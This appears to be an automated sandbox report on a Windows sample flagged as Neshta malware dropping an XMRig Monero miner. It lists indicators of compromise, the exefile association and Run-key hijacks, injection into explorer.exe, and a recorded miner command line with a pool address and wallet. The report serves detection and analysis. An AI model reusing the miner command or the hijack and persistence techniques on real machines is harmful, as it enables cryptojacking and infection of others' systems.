Analysis
-
max time kernel
145s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
30-06-2022 23:38
Static task
static1
Behavioral task
behavioral1
Sample
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
Resource
win7-20220414-en
General
-
Target
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe
-
Size
4.6MB
-
MD5
e60c69bcff750e837526d0763d50344b
-
SHA1
7d3a15333c75990ea48dc678c646a970d84c5fd0
-
SHA256
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6
-
SHA512
a16edc17d8deb3fa0301d70875612282beb692054d69be3ad6cf7c3d6aa944f4eb471e76e12ca3de8e2b2d730c87600e40196585483f7b642283e77a27c90ae7
Malware Config
Signatures
-
Detect Neshta Payload 30 IoCs
Processes:
resource yara_rule C:\Windows\svchost.com family_neshta C:\Windows\svchost.com family_neshta C:\odt\OFFICE~1.EXE family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE family_neshta C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe family_neshta C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE family_neshta C:\PROGRA~2\Google\Update\DISABL~1.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXE family_neshta C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE family_neshta C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe family_neshta C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE family_neshta C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE family_neshta C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE family_neshta C:\Users\ALLUSE~1\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE family_neshta C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\VCREDI~1.EXE family_neshta C:\Users\ALLUSE~1\PACKAG~1\{61087~1\VCREDI~1.EXE family_neshta C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\VC_RED~1.EXE family_neshta C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\VC_RED~1.EXE family_neshta C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE family_neshta C:\Users\ALLUSE~1\Adobe\Setup\{AC76B~1\setup.exe family_neshta -
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
XMRig Miner Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3568-157-0x0000000140000000-0x0000000140747000-memory.dmp xmrig behavioral2/memory/3568-146-0x0000000140740070-mapping.dmp xmrig behavioral2/memory/3568-159-0x0000000140000000-0x0000000140747000-memory.dmp xmrig behavioral2/memory/3568-173-0x0000000140000000-0x0000000140747000-memory.dmp xmrig -
Executes dropped EXE 3 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exesvchost.comServices.exepid process 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4204 svchost.com 3696 Services.exe -
Processes:
resource yara_rule behavioral2/memory/3568-145-0x0000000140000000-0x0000000140747000-memory.dmp upx behavioral2/memory/3568-156-0x0000000140000000-0x0000000140747000-memory.dmp upx behavioral2/memory/3568-157-0x0000000140000000-0x0000000140747000-memory.dmp upx behavioral2/memory/3568-159-0x0000000140000000-0x0000000140747000-memory.dmp upx behavioral2/memory/3568-173-0x0000000140000000-0x0000000140747000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\Services.exe" 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Services.exedescription pid process target process PID 3696 set thread context of 3568 3696 Services.exe explorer.exe -
Drops file in Program Files directory 64 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exesvchost.comdescription ioc process File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13157~1.61\MICROS~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE svchost.com File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE svchost.com File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE svchost.com File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE svchost.com File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE svchost.com File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe svchost.com File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13157~1.61\MICROS~1.EXE svchost.com File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE svchost.com File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe svchost.com File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE svchost.com File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Drops file in Windows directory 3 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exesvchost.comdescription ioc process File opened for modification C:\Windows\svchost.com 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 2 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exepid process 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exeServices.exeexplorer.exedescription pid process Token: SeDebugPrivilege 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe Token: SeDebugPrivilege 3696 Services.exe Token: SeLockMemoryPrivilege 3568 explorer.exe Token: SeLockMemoryPrivilege 3568 explorer.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exesvchost.comServices.exedescription pid process target process PID 768 wrote to memory of 4232 768 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe PID 768 wrote to memory of 4232 768 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe PID 4232 wrote to memory of 4204 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe svchost.com PID 4232 wrote to memory of 4204 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe svchost.com PID 4232 wrote to memory of 4204 4232 168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe svchost.com PID 4204 wrote to memory of 3696 4204 svchost.com Services.exe PID 4204 wrote to memory of 3696 4204 svchost.com Services.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe PID 3696 wrote to memory of 3568 3696 Services.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"C:\Users\Admin\AppData\Local\Temp\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"1⤵
- Modifies system executable filetype association
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\168e89857f9aabb19de0c89aa7a961d22a15574f58e8a0e46090963482bc57a6.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\Services.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Services.exeC:\Users\Admin\Services.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --url=81.61.77.92:1111 -u 42LWroKkaot7k6VU59vZyz7kxmhQGgWJhfdrEhV5GBkQ1Q6DqNRmoDALTM4PoM5n2JcS4t4wYDXTfWR8oyM8XfQhQxXhvdU -p x --coin monero-t 1 --cpu-max-threads-hint=50 -B2⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exeFilesize
175KB
MD5576410de51e63c3b5442540c8fdacbee
SHA18de673b679e0fee6e460cbf4f21ab728e41e0973
SHA2563f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe
SHA512f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exeFilesize
2.4MB
MD58ffc3bdf4a1903d9e28b99d1643fc9c7
SHA1919ba8594db0ae245a8abd80f9f3698826fc6fe5
SHA2568268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6
SHA5120b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXEFilesize
183KB
MD59dfcdd1ab508b26917bb2461488d8605
SHA14ba6342bcf4942ade05fb12db83da89dc8c56a21
SHA256ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5
SHA5121afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exeFilesize
131KB
MD55791075058b526842f4601c46abd59f5
SHA1b2748f7542e2eebcd0353c3720d92bbffad8678f
SHA2565c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394
SHA51283e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXEFilesize
254KB
MD54ddc609ae13a777493f3eeda70a81d40
SHA18957c390f9b2c136d37190e32bccae3ae671c80a
SHA25616d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950
SHA5129d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXEFilesize
386KB
MD58c753d6448183dea5269445738486e01
SHA1ebbbdc0022ca7487cd6294714cd3fbcb70923af9
SHA256473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997
SHA5124f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be
-
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXEFilesize
92KB
MD5176436d406fd1aabebae353963b3ebcf
SHA19ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a
SHA2562f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f
SHA512a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a
-
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXEFilesize
494KB
MD53ad3461ef1d630f38ed3749838bbedc3
SHA18d85b0b392ae75c5d0b004ee9cf5a7b80b1b79e6
SHA25632be2bca2b848da78c02140a288f1bb771cb66757f90d20126b1bcfd5bb40e62
SHA5120e95e5181eab14d5820a3a4952018ac9b290fa3b17add8a5e13d893052f1d2a90a2323c62843f6a9e9af00f27e00108b60e0bce2f848e0a4d8ce0cce153db1ba
-
C:\PROGRA~2\Google\Update\1336~1.71\GO664E~1.EXEFilesize
138KB
MD5950000c930454e0c30644f13ed60e9c3
SHA15f6b06e8a02e1390e7499722b277135b4950723d
SHA25609786f64db91266470b56046098d9825253ba5d6a5361c2f4e6dbc8ec28c9bb2
SHA51222e3c677c83c755e53a7bf8735734541223f57151d588c3380bc758e5433b706441666d0d95c42bd23a720b093a6942a62346dab24ee3f0a18bee3e5ad1cd9d9
-
C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXEFilesize
217KB
MD5ad0efa1df844814c2e8ddc188cb0e3b5
SHA1b1a8a09f2223aab8b8e3e9bc0e58cc83d402f8ab
SHA256c87fd5b223cb6dc716815b442b4964d4670a30b5c79f4fb9f1c3a65ec9072e5a
SHA512532cc173d9ef27098ff10b6b652c64231b4a14f99df3b5de2eb1423370c19590e2a6032023d3ed02e2080f2f087b620ebbbd079e4a47a584ef11f3eaa0eb8520
-
C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXEFilesize
138KB
MD5fafb18b930b2b05ac8c5ddb988e9062f
SHA1825ea5069601fb875f8d050aa01300eac03d3826
SHA256c17785fe7e6b5e08fe5a4ca3679fee85ba6f2e5efcce0fb9807727cf8aa25265
SHA512be034e7377bd27092aad02e13a152fb80ff74c1ba2fb63ccb344cd55315d115ee47e46727cbe55ca808efafa58d7924e3eed965e9a2fd3b9ae2dff7834383e54
-
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXEFilesize
191KB
MD5dd5586c90fad3d0acb402c1aab8f6642
SHA13440cd9e78d4e4b3c2f5ba31435cedaa559e5c7f
SHA256fba2b9270ade0ce80e8dfc5e3279db683324502f6103e451cd090c69da56415e
SHA512e56f6d6b446411ba4ed24f0d113953d9c9e874b2ac4511d33e5c5b85dddd81216579695e35c34b6054c187b00ee214d5648594dad498297f487f2fd47f040a4d
-
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXEFilesize
251KB
MD533cb4562e84c8bbbc8184b961e2e49ee
SHA1d6549a52911eaeebcceb5bc39d71272d3b8f5111
SHA2561f455ea6bab09377e5fdfbd5df102f79c5cbbb5fe5ce456f2fbb34f94ec848bb
SHA5120b638a6e86816ba5d83de5fc381c85371f2f4fe0a2fdff40141859a42e255a082903e5692a49ef253265a42ec99924e5a0aa150cb7ed6cd5521f42f6c9fe27a9
-
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXEFilesize
326KB
MD509f0c144ff13cebc21267e71326324e7
SHA1338ca67ba76427c48aace86ad68b780eb38a252d
SHA25656977618a0fbd66c0ef0ca042290dfe464f4ad5b4b737a4b9db47631a7178f13
SHA512126ed94d3efd7aa54b181ffe35be6dbe6aea1481eaf28f6f418a23717d052e3d53e49c1de8f7aa68120f9be9b84e965ab5ccf3b0f0a1b25de6321217d67e6284
-
C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~4.EXEFilesize
404KB
